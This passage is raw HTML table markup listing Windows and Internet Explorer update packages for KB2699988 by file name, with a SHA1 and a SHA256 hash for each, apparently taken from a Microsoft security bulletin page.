class=\"sbody-td\">5869D94E1EA12E706018CAE16569DD7DFB273702813EA00825197ED57DAD9015</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">6F5B01D41FF6A9EBB00D40668321CD78BE6F896A</td><td class=\"sbody-td\">39B4936F0B257EE481074859FC79408DBB7181D300DD306B50FAD40BD48DD7CC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-fin.exe</td><td class=\"sbody-td\">EF87D8C33143C99124B729C7C303D0F46A90D3D5</td><td class=\"sbody-td\">BFE0D0EFC56BA4E571DFEC54E25165E4804BBE28085AEB47D3192D643C1F8555</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-dan.exe</td><td class=\"sbody-td\">C89A99CB92C3EED42021C891E65A5536B7732672</td><td class=\"sbody-td\">E507E6D84FA6901C9F683C32B01C84D52FA2C531E7574DCE03CE6124C81BAF67</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-heb.exe</td><td class=\"sbody-td\">9D6256F165B6987E68FBF3063CBA4D2063F0819F</td><td class=\"sbody-td\">7F3408538C43F3CCADD13EEC833B86A2196C94F5112C2D4154A680BF78D02541</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">514BC69C3C2A6615BCC6410C293E6B9BBF389313</td><td class=\"sbody-td\">7400B76A4AD3A67A28FA47F2C6CC2427EDFC1257232362C70AF60E0E5F4D6DD4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">E08874BE1C472C4F54830C3A89678DC7E31706C9</td><td class=\"sbody-td\">DB6239501C6374737B42ED389F576E4B9CC7B5AB925CF23225FE7237897BC67C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">B4FFB29252F43F0FF91A0EE26A563EAE99837828</td><td class=\"sbody-td\">02FD91DEECDD6EDB058BD4B498A8429ED2A19E919A324ACBC1A16223D52CC26B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-nor.exe</td><td class=\"sbody-td\">93669F99BBD3BDAC3F3C1D46C06C13FD17EF289A</td><td 
class=\"sbody-td\">EE01CFF57C560AC76E93794520CE4D983257B3D906F39E03FB7984E9A2A08635</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">5F60CADADC9024015ACD01D3D83CEB18CA8DE77E</td><td class=\"sbody-td\">A632F721C4E95D13D12791061E125600790D942F5E3FB54994E6499BDF64AE93</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">8A720D7DB6FD302169973BD7FBDA1744A20E607B</td><td class=\"sbody-td\">5E3AF1932818AF5BA49F9D2B41B3E3AEEE1C195600B3D3CDE0428FF081B6FB39</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">9E74B3098A9194A5B56CFC1DA1140654F21FE236</td><td class=\"sbody-td\">7561F39798A58CA17B7CE69EE8A10039C0BC085F7351085F7663A790BEFF2698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ell.exe</td><td class=\"sbody-td\">C2E6782F96581A34A97A5923DF9B6E40F32AD472</td><td class=\"sbody-td\">AAEC8EE11ABD653753518E4CD70E468A83818D154AC6F145A7FF1FA63DFC4132</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">3C28E9CE3DE9FFC4BABB83109AD578B9B01C880D</td><td class=\"sbody-td\">76CFEDC57448FF3C4582059A9B78569C21F7B8AB7C4A35DB40DF516B02A1BC39</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-enu.exe</td><td class=\"sbody-td\">AAEDE07C9A94A51F39345F8B6C360AFFEF733237</td><td class=\"sbody-td\">F1DCA1495ADBEE9868458025E1BF7776465611A275571DD854AB6523B29D8DF6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-jpn.exe</td><td class=\"sbody-td\">A3C33B0AA97F7EEC668EF478E78EC8CD64526675</td><td class=\"sbody-td\">0DF85E4BCF4877CDCE577A6E32532471ABB23792C2CBC630821412B967259EE4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-fra.exe</td><td 
class=\"sbody-td\">3950B9E1C8BCE927EAF103C2FA26A0E87A2668E4</td><td class=\"sbody-td\">5400C1EFE2A011851186547EB8E88740CF5AB61C343C46993C17C2275BCF8318</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-ptb.exe</td><td class=\"sbody-td\">1929547CF2B0E91C9C4D284C026BF2CF6B7586E9</td><td class=\"sbody-td\">8653DEF834DC28CB1B329CED1310D01F0247FEA71BA1AB94AC32ABAFC85B13C4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-deu.exe</td><td class=\"sbody-td\">5AD34FEF0D2C5E654EB3D6F82BDD280FC45A6F07</td><td class=\"sbody-td\">5F5E29DD1D21DB01D6AFC0ED5145E6072C4194757D2D4E09F916856EFC489D47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-esn.exe</td><td class=\"sbody-td\">EDAED3C394945A8DF6E10B242D21BA32239118E8</td><td class=\"sbody-td\">FD74A6C482F5212064E6110CD7CD551C6571EFF8BB9D79C796DFBDE18ACBC24A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-rus.exe</td><td class=\"sbody-td\">E0DCD4BE0FFF4EFCA99DB6ADC44628ECE39FA34D</td><td class=\"sbody-td\">D240ABC5547E06B31F20D05251B91C250CAEDFE516A145AEC8093B497B883EE2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-cht.exe</td><td class=\"sbody-td\">3BC88A1260723F1F0C209B974AF658BB9D79EF9D</td><td class=\"sbody-td\">12C15434D3CA0EE8470CF555D8552C6911C398550519B47807F6445B9858D595</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-chs.exe</td><td class=\"sbody-td\">CC1C44D836B3A15A1956D2205C9C2578071D1FCF</td><td class=\"sbody-td\">BEEBC6DD1224CBD12BE4A73913843C4238230D6304599BF9D43D89AA5165B7EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-ita.exe</td><td class=\"sbody-td\">974C4A2F54136A475567C40F0F684443D2BF580D</td><td 
class=\"sbody-td\">CED5DB368461BAE1AD9847C75A78B2433618B37FE0D9D9F6264CD2F9F4F3C743</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-kor.exe</td><td class=\"sbody-td\">7AD0EBA699293346BAB941039106564F8BBAB56F</td><td class=\"sbody-td\">2AD67406E693D37C371C90BC52E8366E9B236F1803D54D46B4F36E664E53D41F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-enu.exe</td><td class=\"sbody-td\">5439BA7C52F41037933ADD77D0E31A4FBF2D3822</td><td class=\"sbody-td\">B18DD013FC18980FEB3B8E4B15F3110FABF49AE131E1CBB326472A0B39E5DA4A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-jpn.exe</td><td class=\"sbody-td\">F91190A7DDC0531B655D853E8E0E99004CF2CE1A</td><td class=\"sbody-td\">4970F2751812E0630967A83D994BC032F3FAAAFB160D39066FE796E4101283EA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-fra.exe</td><td class=\"sbody-td\">BF065F6B9B51B77E4FEF9BCC7B5A35F3503D10D0</td><td class=\"sbody-td\">E308E747860F32F54EE27C4E4E7F815B5D4F10E3FDFDD522367285921C8F0006</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-ptb.exe</td><td class=\"sbody-td\">B3A3B01E928556054772BDEDF8063CE2AEB93855</td><td class=\"sbody-td\">2C9BC8CCEAE2701B66BDC44817487E1B2ED905F16775D77633A66807ED7F33BA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">13F7596C84BF670D60899F2BFB35D70F05E0A455</td><td class=\"sbody-td\">BCBA4EB440BA927C6C4F720F1E72F764A80EE852FBE9F7408B02E65874A3A849</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">CE1F3BE52044FA452D280974DB8EC882194608DB</td><td class=\"sbody-td\">9C2FAAB8AE48FA227A4610D329CE6B6412FBC33B1FB46603C9F2EAE615DDA277</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">022C01255EE447DC8BE60340B92C8E377DC98853</td><td class=\"sbody-td\">0C7B8A40EA8E232EAE2EA3D4C02DAD958369B78F2F67DD08336EA9B9DC277024</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">CDB1CD79DC73E8D01D2224608A078226155DE24A</td><td class=\"sbody-td\">29F6065AC9371AA96A49AD35EEA06FFC89FF770CEF6BD5A08996ABDE0FF040F2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">B8E0E423B30D465EE158B6349A078281D9BC450C</td><td class=\"sbody-td\">DF7DDAECAEE84E39F119FB8B0E3785179F344285FC7E0AE249662A9AE8079399</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">892351AE6CCC131B871594E756B750394E4CB31C</td><td class=\"sbody-td\">5EA1D3FE5226B8AE22A9FCAB3DA7C7BF3579BE785EC0161A203C908ACFA6972B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">363D06E868BCAFB0F7D9A20621D93D5E9DB11DFD</td><td class=\"sbody-td\">5B72C49DA9845A0AB9C6C660ACCFD3944A2D2231C5277AE85B5C1E011AC48051</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">2EBF5A591631CDA8D903C7A777E225C4D9D2A43D</td><td class=\"sbody-td\">E3C5F8ADA5852273DD53BFF1B7C21A645C26FE2F7436803A4569D3E5C5BD24C9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">713C56ED3A072A617A538532AD39E1E8CB6678A8</td><td class=\"sbody-td\">DF4A593960D29D1EE20696C73B1E72E0E717679B25CA4DE02181D3713DA4D541</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">81BE80A10277177FE4F3487E92906F8AA81D7AC2</td><td 
class=\"sbody-td\">B65CA0340C846863E88E493DF9F88540CB82016B2AA43B9555F1C418DF0DE5D7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">92C023E0B30D5E95FAE3B7C716598C3F886A66C5</td><td class=\"sbody-td\">FDD734CF4E87C9A92B350A35955B9999FE45EBF658E58F865A8B763BA8A1F07A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">41F71CF7DFAD46396DAB99BE8A92D76B3BFCD526</td><td class=\"sbody-td\">3B87CC03BD142E54C13F995C7343886798228F7D3053097CB211E1008CBDEC81</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">FC47B501926263E1DB4B448E173F751FD599F4B2</td><td class=\"sbody-td\">C54FB2D9B2FC0C1BA4BDF840E9B400D130692DA37C9044BFB99EC27D970DC5E3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">3776561E2520FAD7090ED5B8DB470FA4C3B5DF82</td><td class=\"sbody-td\">3A25E0A1BF6C2B334696C38F8758F386BF4CE4534A3A4DB09FB489B82272A717</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">BCB7C5FC4FBAD5821801F17569CF19A99D981950</td><td class=\"sbody-td\">C0B21D753DC6E541E55CD5AE77E904A67FCCB1020E3B55C8F9CFB3870E1E6CA7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">114319A4920BF07A3D4F6B377DE4D34D4BFC36FC</td><td class=\"sbody-td\">5C34EFF1D3AAC2861327EE08829960DD59DF50864AB89F72D32B2B63130693EC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-enu.exe</td><td class=\"sbody-td\">37BF6B94B5717FC27C264A3A6D2925D38C7B00CB</td><td class=\"sbody-td\">B92BB6D9F9D41F9843EFB4A7AF8067100F98C5F81A446D7CEC370A4F02BEAC7D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-csy.exe</td><td 
class=\"sbody-td\">0B3E9B63CEA006705FF2E76C971750B5950B8473</td><td class=\"sbody-td\">9A04372C3049D337DE864953C61469B4F5442C94725071BADA5FDCADD5B1D63A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-dan.exe</td><td class=\"sbody-td\">D617FE6600B6987F7B4529BB08619CC0CBD9A881</td><td class=\"sbody-td\">F615C546565DC695FBC4012067039B878EF9773D61C12C15C0CE22295764D152</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-fin.exe</td><td class=\"sbody-td\">D1B4FDD35B0B7268E6CF71FB8F1F0D5F0FC928CC</td><td class=\"sbody-td\">7C9507D8ACAD13198C36685A33ADAB27BDF2A52B54FE29E91692E7A08FA6E36D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-nld.exe</td><td class=\"sbody-td\">0EB3B7ECBC965E68EBED417995F2CAF0EF60BBAB</td><td class=\"sbody-td\">3EA01E2FDFA879BFEEBEF55DEA905A439D5031151C3D00CF8237AB166CFB80E2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-heb.exe</td><td class=\"sbody-td\">F05F5DEB2AEDA0693B0F54B04ACD724D4E5858CC</td><td class=\"sbody-td\">092FDF7238EAED170768E29342C4666A4B5DA63A79F4A860BFE6AFAA7ECB10A2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ptb.exe</td><td class=\"sbody-td\">B89E033A05B1B276659AF08339A2639126917059</td><td class=\"sbody-td\">CA0B250BACC45006E81A9D797A0A75E2DAF58D36C11A0082103717C356A40A44</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-sve.exe</td><td class=\"sbody-td\">990FAC7E7B8B6BBAD2B71C86796D08F3941F8AFE</td><td class=\"sbody-td\">3B117F63F67DE5F94D363F75F479B6CB51E11D933C0BAEB826C8E6BB60DEDD02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-nor.exe</td><td class=\"sbody-td\">776FDD3599BE07D1803A55DD34960CA3312B4C3A</td><td class=\"sbody-td\">E23138CEC571877B91952A23FD352259D4BA378400C693B06D128D1B32AB7811</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-esn.exe</td><td class=\"sbody-td\">B2037A19F2319B5D5C1F1FC7B44A073D6B6B9CBC</td><td class=\"sbody-td\">F594F08355A5F2CBBCA6FE898CF7F4632FC69D875CC0688F047A1EA33F653233</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-rus.exe</td><td class=\"sbody-td\">7CA2B440829750044DCC41058FDFA9F9EE194D6A</td><td class=\"sbody-td\">0C468C88EF3306CF2B9D9B59A88594B8F390D70E833B54CAC8D0E5862422F662</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-chs.exe</td><td class=\"sbody-td\">B73B6C5C39CF8699152DBA43E66252F915784CAE</td><td class=\"sbody-td\">D0C3F66E04761FB7133FE7E0B09F9D0E487109E9AEF3E8E1ED34614474321D1B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ell.exe</td><td class=\"sbody-td\">31C5426B7CEB54525BB38F81CEDA39CC3C204A75</td><td class=\"sbody-td\">D75A254D15524C47E8354AF7A5C34AA0170A6C0017D938B6D089226F13123386</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ptg.exe</td><td class=\"sbody-td\">B9CC37983CC37B5132AEE1ADF9F16DBA73F09EC2</td><td class=\"sbody-td\">67EC3E4DD2DABB11E970580013BF4B8F94239FEF0D7D68C1D5044679F49762C9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-kor.exe</td><td class=\"sbody-td\">5FE1D21C80B35EC677DAAE6A4A305624551100DB</td><td class=\"sbody-td\">A68E09F4186706CC3F7455008CEC48B3EFCA9DAE78391DDC39C22DCD0BDCBC0A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-trk.exe</td><td class=\"sbody-td\">2B1ED70B291D8F04F002384015EC02D5F70D1CC7</td><td class=\"sbody-td\">320B64857687ACF3AAAC47B499EA401B4CDEA179918AD876C47B0D1CC2D5B440</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-jpn.exe</td><td class=\"sbody-td\">F1127E0A55D14DBAF720BA6E0232DD8D21750633</td><td 
class=\"sbody-td\">70A812DE2FA438B4573FF1DCCFE9E9F5C7B6857DF5A3314415A56AB76071F709</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ita.exe</td><td class=\"sbody-td\">7C5E13285247BAA521D4378E90B321EB937F9DDC</td><td class=\"sbody-td\">15B17995D2C2730D8C77B8212B55E7A4011FAA3D3050251DBB964BEDF5F61872</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-fra.exe</td><td class=\"sbody-td\">74A903B9C7FD88E04253CDF90B3B7E64AAC95538</td><td class=\"sbody-td\">84F44D1287EC7FB79946930D2F57CC30A84B621041A2C15A4C18DD11E8717B5B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">2396DD3C9709515D323A6A44068A305E5EC6C903</td><td class=\"sbody-td\">EF238010DA1B6506156CD53A78CB56CEB7F45D56E10BF18A80CFFE8CC2FD8C5B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">71EA345B4C2CE76EDFDDAB0A4FA997851D17D912</td><td class=\"sbody-td\">EF45C563AD16E80501FAA74965A3243E6D402E69CB66DC784FA9FAEEE9DA2103</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">9D75245CF72C1A3B58215AB1E67A671B1B8ED599</td><td class=\"sbody-td\">C8628577DBF8E734735020D143D6628ED038B1A398499ECBD032634B08779365</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">7CD990D067B049C7E759D267128FE391D7C56153</td><td class=\"sbody-td\">7067985EE455E4918A1BB8A5A05041709C69567D1EDB81EF8B1C5EB8FD77FA8E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">6AF6F0836E82C9B49603D7C4DFB558D9812521DF</td><td class=\"sbody-td\">F6D346AF76593CAAEA366565F4E2C73C70E3F4C13D571EBF62FC7D91463544FD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-deu.exe</td><td 
class=\"sbody-td\">A07152D2384F3C927E2F004AD60609F362B152CC</td><td class=\"sbody-td\">6B43358A64DAD4443F9F2A99E7E6196862504F00D3F50852F9479FA4353853E2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-cht.exe</td><td class=\"sbody-td\">36A6E4F3E77A2F0CBBD4EB56332F3437E35ABAD6</td><td class=\"sbody-td\">314ED06BCA772C28DB45F4242A12A0879EE04068EF2661DB07884464D394AAC0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-enu.exe</td><td class=\"sbody-td\">C781F86FB6CDB7A38C70FCB36EB496812AAAFB36</td><td class=\"sbody-td\">916C3BE4E7FED7397E658D425D00A4436D81B69F2F552F03EC42AC750B6CB619</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-jpn.exe</td><td class=\"sbody-td\">680F5B978A9FE583E12358885700AB90B52E718B</td><td class=\"sbody-td\">15EB52836E07BD39842F59F63EEAE84C728DE24E572C27E2018C8B083FCE382E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">90F162A98D9FA5AF70B21A79216B8AC9AC18AC02</td><td class=\"sbody-td\">DB206FDF459DB0F02903A41388A578401A3E59EF9204BE4AC51B3808B1278557</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-ia64-jpn.exe</td><td class=\"sbody-td\">044D96A548A7955777280B4AE6127EB688D2AAE6</td><td class=\"sbody-td\">54905D038CAC48EF0EC4454154809A12EDD7C98776B6718D533C843CCC25F85A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.1-kb2699988-x64.msu</td><td class=\"sbody-td\">EF4438C952B2EF46C90AD963097E94C6C7C1397E</td><td class=\"sbody-td\">A17B4D1BC6EE60684A98B7A93C6FBC87EE7AAA6691E7610498AAF516E6E7409B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">C366FA06288B975FF43661D2BD2B68589DDA3C4B</td><td class=\"sbody-td\">CE8859FB6AD173F1DE957B756D3FD9DB19A556A1BF1C536FA59C0E6A86B38A97</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">ie9-windows6.1-kb2699988-x64.msu</td><td class=\"sbody-td\">5E9BD26B8D993D64CD0EE8B352E4207305ABCEDB</td><td class=\"sbody-td\">06DDA505893EEBA66592CCB0CDA819FC09468540B79DE5661309BE4280913766</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">66EE6EA480E4126D2AE7BDB22C859B0DA86F8197</td><td class=\"sbody-td\">C5D2B28E604456CD0CC7ADC90D493844EE171754116B8D61A8844AC01DE5C03C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">58763032E00AB7569060059908CBE87F3BB15F79</td><td class=\"sbody-td\">1CEB696BB948A50D000BF7FE64B8F450EDC7A567F09B489896B403B7FAE3A8B2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">32E33B7CB074F07A708C1909E2624B5D4DB5B9DB</td><td class=\"sbody-td\">C8F736140C4D13EAC05750CF2C547BE99435B9258A873B9E991C3F4C571FF3DA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">163E6E6CE4ED4F188DA8AD01B322E8CD01890730</td><td class=\"sbody-td\">C93CD88822D018E33A6DB19A38DE02621F81F6EAE84D8FA87C0AD1C2C1640035</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">675E8EA8BE7553CD9B356B45A3E95A9A5A5D923E</td><td class=\"sbody-td\">1195EF4BC93807345132B68411EB528E3A3EF9808724A733E24A89F6AF116CF7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">7A113713B6A45E6F9FCC34110FC3B33FFFB85383</td><td class=\"sbody-td\">C8BF8FBFAD188CB4EA95DABC1C101CDF09410762B278F2005CC2B05201C9BE1E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">19E54BDD358FBBE4BD6A295D0E0BA4A93823261F</td><td 
class=\"sbody-td\">415CA80DFFE01EEDF2DEEFA1267E521D35FFD43C58068875F519FF84945ACA57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">3DB7E2951BF981EA504AF81D931689605CF902C4</td><td class=\"sbody-td\">FC24D5CFB71ADAD51E9FA0C03369D35F4988CE7D177AA53EC93161A3F7B9FB16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">0809AFCF5DD5AD4F798FE5B4509ADCB0402FA44D</td><td class=\"sbody-td\">42BF87A8D9F36DF245E9E1A4292847F961225037E91F48099ED447DD49946AFF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">368FD918F0FD71D650187920AFFD527733C0DB49</td><td class=\"sbody-td\">410FCC4E76B0737B8EC93BFA8D024D41969BA1F884DC60B3621AF3DCF3F0EE86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">4C755DCFD9542690CE30FA1C1968D335E1C9A75C</td><td class=\"sbody-td\">8EFEDFF8B8F3FBD171420A3E41D293A3CD87B317E5B06DF8E4887F2720634F9F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-deu.exe</td><td class=\"sbody-td\">AEA53C4D6A02093F9D5D651682B3CB579780B71D</td><td class=\"sbody-td\">11D4D77DA11D9623FA3907943FAD97E2C12DE4A29EB57E2F8C62A860A3FC526A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-ptb.exe</td><td class=\"sbody-td\">C5DE9289C0AAEB011F70734C0F9DFF2D4FE7F1A2</td><td class=\"sbody-td\">DE0F0602E3721E42867A41A4091302780E3724B2A3014B4BD215651CC90610AC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-fra.exe</td><td class=\"sbody-td\">028C6234805DC697C74AC87BF5E190BCFCC9DBBB</td><td class=\"sbody-td\">F542CBAD554C4AD231DE6EF0210DF7B9B5F00974A32F1C33F81240C1932544EB</td></tr><tr class=\"sbody-tr\"><td 
